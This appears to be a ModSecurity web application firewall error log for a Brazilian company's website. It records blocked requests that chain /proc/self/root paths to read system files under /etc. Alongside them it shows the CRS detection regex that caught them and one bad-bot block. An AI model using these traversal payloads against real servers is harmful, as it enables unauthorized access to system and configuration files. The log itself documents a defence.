[Mon Mar 16 13:01:24.423898 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:58502] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpVLysWC90G-1nBrBG5AAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:01:26.811694 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:41882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpVhXjF1vJNtV6CWr3zQAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:28.104128 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.243.203:41890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpWAlT9VtDQc7bgUy0NgAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:29.339829 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.243.203:41896] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpWZqj1wV0Si-OkefvrwAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:33.061487 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:34210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpXdSswJuvopo3lOhgngAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:01:34.355750 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:49696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpXpqj1wV0Si-OkefvsQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:01:36.906167 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:46086] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpYI6lpbStxTqkSktt1gAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:38.194099 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:46102] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpYtSswJuvopo3lOhgnwAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:50.177492 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:49704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpbpqj1wV0Si-OkefvxgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:01:52.935665 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.228.16:49990] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgpcI6lpbStxTqkSktt2gAAAkw"]
[Mon Mar 16 13:02:07.772121 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:44596] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpfwlT9VtDQc7bgUy0WgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 13:02:11.163139 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:42210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpg9SswJuvopo3lOhgsQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:02:12.481259 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.241.46:42222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgphHjZBu2q05ozVU9ZggAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:02:34.246755 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:42238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpmo6lpbStxTqkSktuAgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 13:02:54.719884 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:46118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgprrABkC4fWIHEf8Hs6gAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:02:56.030959 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:38440] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpsAlT9VtDQc7bgUy0gQAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:02:57.171222 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:38442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpsbysWC90G-1nBrBHBQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:02:57.448667 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:38442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpsbysWC90G-1nBrBHBgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:02:58.747742 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:38456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpsv9ocpUE4ed4uDzwmAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:00.024899 2026] [:error] [pid 11972:tid 140411733534464] [client 74.7.243.203:38468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgptJqj1wV0Si-Okefv3QAAAAE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:03.506970 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:51058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpt46lpbStxTqkSktuDwAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 13:03:04.841985 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.243.203:51070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgpuJqj1wV0Si-Okefv4AAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
